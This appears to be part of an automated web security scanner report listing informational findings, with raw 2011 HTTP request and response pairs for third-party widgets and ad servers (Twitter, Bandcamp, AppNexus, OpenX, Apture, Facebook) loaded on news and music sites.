FL","profile_sidebar_fill_color":"E3E2DE","is_translator":false,"profile_background_tile":false,"url":"http:\/\/www.orlandosentinel.com\/business","listed_count":31,"contributors_enabled":false,"lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Eastern Time (US & Canada)","created_at":"Tue Jan 11 14:21:07 +0000 2011","profile_link_color":"088253","name":"OSentinelBiz","show_all_inline
...[SNIP]...

Request 2

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:42 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949582-12301-51426
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:42 GMT
X-RateLimit-Remaining: 122
X-Runtime: 0.01829
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 8f0ccd48c62f4c122a2d63bfbb18760efe7d9d8f
X-RateLimit-Reset: 1304953175
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA9sDtUvAToHaWQiJWY5OTdmYTg2NTZiN2Nm%250AODdhMjM5NzVkOTE5Zjk1YWI1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--43ce3e84a5845521567df5dee760fbc817d3b7a0; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"web","geo":null,"favorited":false,"retweet_count":0,"in_reply_to_screen_name":null,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"place":null,"created_at":"Mon May 09 13:46:19 +0000 2011","contributors":null,"user":{"default_profile_image":false,"profile_use_background_image":true,"default_profile":false,"statuses_count":388,"following":null,"profile_background_color":"EDECE9","description":"Central Florida's leading source for business, technology and consumer news. Be the first to know when business news happens -- text OSBIZ to 43886. ","screen_name":"OSentinelBiz","profile_background_image_url":"http:\/\/a2.twimg.com\/profile_background_images\/191413454\/x562a42969f39cc560ae5a79a392dc5c.jpg","follow_request_sent":null,"verified":false,"friends_count":850,"id_str":"236849001","profile_text_color":"634047","location":"Orlando, FL","profile_sidebar_fill_color":"E3E2DE","is_translator":false,"profile_background_tile":false,"url":"http:\/\/www.orlandosentinel.com\/business","listed_count":31,"contributors_enabled":false,"lang":"en","followers_count":595,"protected":false,"notifications":null,"time_zone":"Eastern Time (US & Canada)","created_at":"Tue Jan 11 14:21:07 +0000 2011","profile_link_color":"088253","name":"OSentinelBiz","show_all_inline_media":false,"geo_enabled":false,"profile_sidebar_border_color":"D3D2CF","id":236849001,"utc_offset":-18000,"favourites_count":0,"profile_image_url":"http:\/\/a2.twimg.com\/p
...[SNIP]...

12.5. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Request 1

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:25 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=B19E03FF5E8534E71DA55EB294CAD1653B3E3289; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:25 GMT
Connection: Keep-alive
Content-Length: 430

You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF">this link to: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF</a>!

Request 2

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:47 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=89BF2ADECF2086BD6F3E6B54B84F2B570EB278EE; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:47 GMT
Connection: Keep-alive
Content-Length: 352

You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF">this link to: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&linkcol=4285BB&bgcol=FFFFFF</a>!

12.6. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ib.adnxs.com
Path:   /ttj

Request 1

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATCw6J_uBBCw6J_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:03:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:03:28 GMT
Content-Length: 629

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=fXkB9tGpyT99eQH20anJPwAAACAEVvI_fXkB9tGpyT99eQH20anJP0DNzz_fMb4vSsYda6b2ziUw9MdNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAsBAAAgMCAAUAAAAAniamrQAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949820%29%3Buf%28%27r%27%2C+184995%2C+1304949820%29%3B&cnd=!FyBHGgjC6AIQo6ULGAAg8dUBKAAxfXkB9tGpyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EKO5AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC&referrer=http://www.thevine.com.au"></iframe>');

Request 2

GET /ttj?id=407559&pubclick=[INSERT_CLICK_TAG] HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQQy-af7gQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfw)(CZ#0c)_Vsd7xrIB//C+rXs=j-NmSHESbuj(Xfy%gQ8(_!$Qn`j>l!w]Qc4sqiteE')fkA#BuR9S#?g?x96rwk*ZwCg%AAgCaQC9oD/Z'3KOz[NgtOXq7:8zNI%RI]VLxSk0/<ReOqu`kW+mpt*RcdU`309#Npmqz:f120r*CIweF>wD.dc[jewf7Jg1C%'=:^a?O!THxg^g6]dlW4kBRMj<u?URG7od_TaFgZ6+E*Ien0D+8EWfv:I`ua'+iw%6g8[*WG-xb.gqGglNq=ppU9pMi>NhIWtG!c<-Hz]x$Nj*ieT0/DS+p9-9itwW.^@-FVBcEA%SQ3D#EVY@pHSJKc1qYrpTfZ+^5CoqqS0JzwnQMX0h^)-5M6iw68MyaTc`NLmrB$Up8jXday>aPC4HGACKGA<XW6tO(HpUYp@EZKc@qTY<b(XFqNJ5Lo(Q%@XrX2UOpjstXFBy^^OTow.15i]1m'KEuj>:`7Jfb$qToO]KZDC!p(2=spx-Wkmic-P-=$d<X]p6j]/LnTgv#/BjiE%RGEQhY)+`5Iw`Y.[O0:ufI'/oAjfj5OJE@2X-prW^X0@]6u9gl4:1lI9Pi)1j^Mc@XYz4^70y1M0s_2Y`wz]XIhEQ_(

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 10-May-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII-YMBEAoYASABKAEwy-af7gQKEgjxlQEQChgBIAEoATDG6J_uBBDG6J_uBBgB; path=/; expires=Sun, 07-Aug-2011 14:03:50 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 09 May 2011 14:03:50 GMT
Content-Length: 594

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=-U7MejGUyT_6Tsx6MZTJPwAAACAEVvI_-k7MejGUyT_5Tsx6MZTJP7kD6zF_uqt1SsYda6b2ziVG9MdNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAA3QsAAgMCAAUAAAAAoyaSpQAAAAA.&udj=uf%28%27a%27%2C+577%2C+1304949830%29%3Buf%28%27r%27%2C+184995%2C+1304949830%29%3B&cnd=!_R-rFAjC6AIQo6ULGAAg8dUBKAAx-U7MejGUyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EJ-4AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC"></iframe>');

12.7. http://oads.mochila.com/openx/www/delivery/ajs.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://oads.mochila.com
Path:   /openx/www/delivery/ajs.php

Request 1

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=9eb743ef8885d18c9cf09de695a0ce63; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1532

var OX_39787ffc = '';
OX_39787ffc += "<"+"script type=\"text/javascript\">\n";
OX_39787ffc += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_39787ffc += "var _mbuyerId = \'SnapTimes\';\n";
OX_39787ffc += "try{_mbuyerId = mbuyerId;}catch(err){}\n";
OX_39787ffc += "if((_mbuyerId==\'\')||(_mbuyerId==\'unknown\')){_mbuyerId=RD;}\n";
OX_39787ffc += "_mchannelId = 13429;\n";
OX_39787ffc += "var mcmp = \'all_ibd_tout_widget\';\n";
OX_39787ffc += "m3_r = Math.floor(Math.random()*99999999999);\n";
OX_39787ffc += "document.write(\'<"+"iframe allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=\'+_mbuyerId+\'&channelId=\'+_mchannelId+\'&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=\'+RD+\'&mcmp=\'+mcmp+\'\" style=\"width:300px;height:140px;border:0px\"><"+"/iframe>\');\n";
OX_39787ffc += "<"+"/script><"+"div id=\'beacon_4304a2ffe0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://oads.mochila.com/www/delivery/lg.php?bannerid=1051&amp;campaignid=185&amp;zoneid=167&amp;source=mochila_live&amp;loc=1&amp;referer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&amp;cb=4304a2ffe0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
document.write(OX_39787ffc);

Request 2

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=41609c32b19ab33a6401744a19550398; expires=Tue, 08-May-2012 13:59:59 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1419

var OX_00092723 = '';
OX_00092723 += "<"+"script type=\"text/javascript\">\n";
OX_00092723 += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_00092723 += "var _mbuyerId = \'SnapTimes\';\n";
OX_00092723 += "try{_mbuyerId = mbuyerId;}catch(err){}\n";
OX_00092723 += "if((_mbuyerId==\'\')||(_mbuyerId==\'unknown\')){_mbuyerId=RD;}\n";
OX_00092723 += "_mchannelId = 13429;\n";
OX_00092723 += "var mcmp = \'all_ibd_tout_widget\';\n";
OX_00092723 += "m3_r = Math.floor(Math.random()*99999999999);\n";
OX_00092723 += "document.write(\'<"+"iframe allowtransparency=\"true\" frameborder=\"0\" scrolling=\"no\" marginwidth=\"0\" marginheight=\"0\" src=\"http://admatch-syndication.mochila.com/viewer/channel/badgex?&asHtml=true&buyerId=\'+_mbuyerId+\'&channelId=\'+_mchannelId+\'&tid=10630&destination=&articleTemplateId=&badgeTemplateId=&widgetClass=&assetExcludeId=null&randomize=false&buid=1&rd=\'+RD+\'&mcmp=\'+mcmp+\'\" style=\"width:300px;height:140px;border:0px\"><"+"/iframe>\');\n";
OX_00092723 += "<"+"/script><"+"div id=\'beacon_9861d9dafc\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://oads.mochila.com/www/delivery/lg.php?bannerid=1051&amp;campaignid=185&amp;zoneid=167&amp;source=mochila_live&amp;loc=1&amp;cb=9861d9dafc\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
document.write(OX_00092723);

12.8. http://www.apture.com/js/apture.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Request 1

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response 1

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:05 GMT
Last-Modified: Mon, 09 May 2011 13:59:05 GMT
Etag: "ec25c03593279e41a51488a37cd846db"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 3794
Date: Mon, 09 May 2011 13:59:05 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html";A.visitId=74532128726058;A.abtests={};A.userCookieId="QuDxqe1K4l";
A.aptureConfig = {
   magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="pgKiQTB";

A.capabilities=19718;
A.getPage=function(){return apture.make("Page", {ignored:{"deleted":{"27241857":1,"27241875":1},"url":{"http://media.indianasnewscenter.com/documents/WISE_privacy.pdf":1},"t":3},links:[{"linkType":0,"oI":null,"childLinks":[],"creationMode":2,"height":null,"linkText":"Twitter","caption":"","id":27241857,"title":"@inctoday","url":"http://twitter.com/inctoday","pageText":null,"mediaItem":{"extendedPrettySource":"Twitter Profile","itemInfo":"inctoday","sourceUrl":"http://twitter.com/inctoday","hash":"6442986459622746656","genericTMMThumbUrl":"tmm_tweet.gif?v1","title":"@inctoday","titleIcon":"badge_twitter.png","flexibleSize":false,"prettySource":"Twitter","_class":"TwitterArticle","linkIconY":1150,"topImage":apture.make("TwitterImage", {"thumbHeight":48,"sourceUrl":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","hash":"-2818511726338247931","title":"Indiana's NewsCenter.jpg","url":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","timestamp":1,"flexibleSize":false,"prettySource":"Twitter","licenseTemplates":"","height":48,"width":48,"caption":"","previewUrl":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg","forceLinkOnClick":false,"fullsizeThumb":false,"main":[],"copyrightNotice":"","thumbWidth":48,"source":"http://a3.twimg.com/profile_images/198316951/twitter_pic_normal.jpg"}),"genericThumbUrl":"nf_tweet.gif?v6","main":["itemInfo"],"id":22936602},"width":null,"token":"jIFMzDXY4x","plid":863426940,"display":{}},{"linkType":0,"oI":null,"childLinks":[],"creationMode":2,"height":null,"linkText":"Tweet","caption":"","id":27241875,"title":"@share","url":"http://twitter.com/share","pageText":null,"mediaItem":{"extend
...[SNIP]...

Request 2

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response 2

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:06 GMT
Last-Modified: Mon, 09 May 2011 13:59:06 GMT
Etag: "bf541ce12ce20db098b30e48e400fb71"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 1537
Date: Mon, 09 May 2011 13:59:06 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="";A.visitId=165053501822643;A.abtests={};A.userCookieId="QuDxqe1K4l";
A.aptureConfig = {
   magicLinks: {"status":207,"mlinks":[]}
};
A.siteToken="pgKiQTB";

A.capabilities=19718;
A.getPage=function(){return apture.make("Page", {tmmLinks:[],id:0});};
A.siteId=206082;
A.maxPageLinks=200;
A.platformName="Unknown";
A.platformId=11;

A.barTitle="< Enter title >";
A.scrollOffset=99999999;
A.barColor="#444444";
A.barTitleColor="#ffffff";


A.siteSearchUrls=["http://indianasnewscenter.com/"];

A.shadowColor="#000000";

A.twitterHandle="Apture";




A.auto=1;

A.isApp=1;
//License terms: http://www.apture.com/license/
if(!B){ (function(s){var b=eval("(/*@cc_on!@*/0?(window.XMLHttpRequest/*@cc_on&&@_jscript_version>=5.7@*/?'ie7':null):(window.navigator.userAgent.toLowerCase().search(/iphone|ipad|android/)>-1)?null:(document.childNodes&&!document.all&&!navigator.taintEnabled)?'khtml':(document.getBoxObjectFor||(window.mozInnerScreenX===0||window.mozInnerScreenX))?'gecko':'unk')");if(b){s.type='text/javascript';s.charset='utf-8';s.src="http://cdn.apture.com/media/storage."+b+".v30596971.js";s.defer='true';(document.getElementsByTagName("head").item(0)||document.body).appendChild(s)}})(document.createElement('script')) }
else if(A.initApp)A.initApp();

}else{var i = A.prefs;
if(i&&(i.created||i.editing))alert("This page has multiple Apture script tags in the HTML template. Please remove all but one of them.")
}})();

12.9. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story&layout=button_count&show_faces=true&width=135&action=recommend&font&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.120.130
X-Cnection: close
Date: Mon, 09 May 2011 13:59:33 GMT
Content-Length: 7014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<script type="text/javascript">
Env={module:"like_widget",impid:"83934688",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:375286,vip:"66.220.146.11",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"-rYxz",lhsh:"282ea",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>

<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/7NS4A3NTFw2.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
